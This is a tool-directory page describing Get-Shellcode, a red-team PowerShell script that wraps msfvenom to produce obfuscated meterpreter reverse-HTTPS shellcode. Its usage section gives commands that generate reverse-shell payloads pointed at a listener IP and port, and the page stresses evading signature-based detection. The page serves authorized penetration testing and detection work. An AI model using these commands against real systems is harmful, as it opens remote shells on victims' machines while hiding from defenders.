OpenSec Atlas

Get-Shellcode: An Open Source Script for Penetration Testing & Red Teaming | OpenSec Atlas

Penetration Testing & Red Teaming

Script

Get-Shellcode

Get-Shellcode generates obfuscated PowerShell shellcode from msfvenom payloads to aid stealthy penetration testing and red teaming.

View on GitHub

About This Tool

A solution to create obfuscated shellcode from msfvenom for PowerShell.

Primary Use Case

This tool is used by penetration testers and red teamers to create obfuscated PowerShell payloads from msfvenom shellcode, enhancing evasion against detection mechanisms. It simplifies generating reverse shells with customizable payloads for use in PowerShell environments on target systems.

Key Features

Generates obfuscated PowerShell shellcode from msfvenom payloads
Supports default staged meterpreter reverse HTTPS payloads with minimal parameters
Allows custom msfvenom payload input with full parameter control
Obfuscates custom payload variable names
Compatible with PowerShell versions 2.0 and above
Tested on Kali Linux with PowerShell Core 7.2.4
Outputs obfuscated payloads to file
Relies on msfvenom being installed and accessible

Insights & Recommendations

This tool requires msfvenom to be installed and accessible on the system, which is standard on Kali Linux. It is designed specifically for PowerShell payloads and requires PowerShell version 2.0 or newer. Using staged payloads is recommended for faster processing and smaller payload size. Users should ensure they have appropriate authorization before deploying generated payloads.

Installation

Ensure Kali Linux or a compatible Linux distribution with PowerShell installed
Verify msfvenom is installed and accessible (default on Kali Linux)
Download or clone the Get-Shellcode.ps1 script to your working directory
Open a terminal and launch PowerShell by running `pwsh`
Load the script into the PowerShell session by running `. ./Get-Shellcode.ps1`

Usage

. ./Get-Shellcode.ps1

Loads the Get-Shellcode script into the current PowerShell session

Get-Shellcode -Ip 192.168.49.80 -Port 443

Generates the default staged meterpreter reverse HTTPS shellcode with specified IP and port

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1"

Generates an obfuscated shellcode using a custom msfvenom payload with specified parameters

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1" -OutFile obfuscated.ps1

Generates a custom obfuscated shellcode and outputs it to the file 'obfuscated.ps1'

Smart Usage Notes

Integrate with Metasploit Framework to automate payload generation and deployment during red team engagements.Use obfuscated PowerShell payloads to test and improve blue team detection capabilities for script-based attacks.Leverage the tool in purple team exercises to simulate stealthy command execution and evaluate detection-response workflows.Combine with endpoint detection tools to validate the effectiveness of host-based defenses against obfuscated shellcode.Automate payload customization to rapidly adapt to different target environments and evade signature-based detection.